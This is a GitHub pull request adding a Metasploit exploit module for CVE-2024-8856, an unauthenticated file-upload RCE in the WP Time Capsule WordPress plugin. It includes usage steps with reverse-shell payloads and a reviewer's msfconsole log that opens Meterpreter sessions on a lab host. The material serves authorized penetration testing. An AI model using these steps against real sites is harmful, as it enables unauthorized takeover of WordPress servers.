Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit module for CVE-2024-8856 - WP Time Capsule RCE #19713

Merged
merged 5 commits into from
Dec 13, 2024

Conversation

Chocapikk
Copy link
Contributor

Hello Metasploit Team,

I have developed a new Metasploit module that exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.

Over 20,000 active installations

  • Start msfconsole
  • use exploit/multi/http/wp_time_capsule_file_upload_rce
  • Set RHOSTS to the target IP address
  • Configure TARGETURI to the WordPress installation path
  • Set PAYLOAD (e.g., php/meterpreter/reverse_tcp)
  • Set LHOST and LPORT for the payload
  • Run the exploit with exploit
  • Verify a Meterpreter session is established

Thank you for your consideration.

Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great work @Chocapikk! One tiny suggestion. Testing was as expected 🚀

Testing

ARCH_PHP

msf6 > use wp_time

Matching Modules
================

   #  Name                                                Disclosure Date  Rank       Check  Description
   -  ----                                                ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_time_capsule_file_upload_rce  2024-11-15       excellent  Yes    WordPress WP Time Capsule Arbitrary File Upload to RCE
   1    \_ target: PHP In-Memory                          .                .          .      .
   2    \_ target: Unix/Linux Command Shell               .                .          .      .
   3    \_ target: Windows Command Shell                  .                .          .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/wp_time_capsule_file_upload_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'

[*] Using exploit/multi/http/wp_time_capsule_file_upload_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > use 1
[*] Additionally setting TARGET => PHP In-Memory
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set rhost 172.16.199.158
rhost => 172.16.199.158
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set rport 5555
rport => 5555
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
[*] Sending stage (40004 bytes) to 172.24.0.3
[+] Deleted YY.php
[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.24.0.3:51180) at 2024-12-12 15:56:54 -0900

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : d41b5b7f71e1
OS          : Linux d41b5b7f71e1 5.15.0-125-generic #135~20.04.1-Ubuntu SMP Mon Oct 7 13:56:22 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > exit

ARCH_CMD

msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set target 1
target => 1
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_time_capsule_file_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WP Time Capsule plugin appears to be vulnerable.
[*] Sending stage (3045380 bytes) to 172.24.0.3
[+] Deleted z5.php
[*] Meterpreter session 2 opened (172.16.199.158:4444 -> 172.24.0.3:45764) at 2024-12-12 15:58:51 -0900

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.24.0.3
OS           : Debian 11.8 (Linux 5.15.0-125-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

@jheysel-r7 jheysel-r7 merged commit afd3d0b into rapid7:master Dec 13, 2024
37 checks passed
@jheysel-r7
Copy link
Contributor

Release Notes

This exploits a Remote Code Execution (RCE) vulnerability identified as CVE-2024-8856 in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.

@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Dec 13, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

4 participants